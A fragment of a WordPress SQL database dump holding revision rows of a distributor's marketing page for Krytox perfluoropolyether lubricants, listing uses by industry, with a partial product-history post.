• O-rings—sealants, lubricants Aerospace-Specific Applications • Oxygen systems—valve and pump packing seals, mechanical seals, and connectors • Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure • Actuators—mechanical/gear-type actuators for control valves and systems • Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Our categories" ]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 15:56:20', '2016-09-28 15:56:20', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2072, 2, '2016-09-28 15:59:06', '2016-09-28 15:59:06', '<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Pick your Industry</strong>\r\n\r\n<strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong>\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\n<strong>Food Processing</strong>\r\n\r\n<strong>Medical Industry Equipment Applications</strong>\r\n\r\n<strong>Metal Processing</strong>\r\n\r\n<strong>Oxygen and Reactive Gas Service</strong>\r\n\r\n<strong>Power Generation</strong>\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\n<strong>Textile</strong>\r\n\r\n<strong>Tire Mold</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Our categories" ]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 15:59:06', '2016-09-28 15:59:06', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2073, 0, '2016-09-28 16:04:36', '2016-09-28 16:04:36', '', '', '', 'publish', 'closed', 'closed', '', '2073', '', '', '2016-09-28 16:04:36', '2016-09-28 16:04:36', '', 0, 'https://www.miller-stephenson.com/nf_sub/2073/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2075, 1, '2016-09-28 16:27:50', '2016-09-28 16:27:50', 'Discovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all 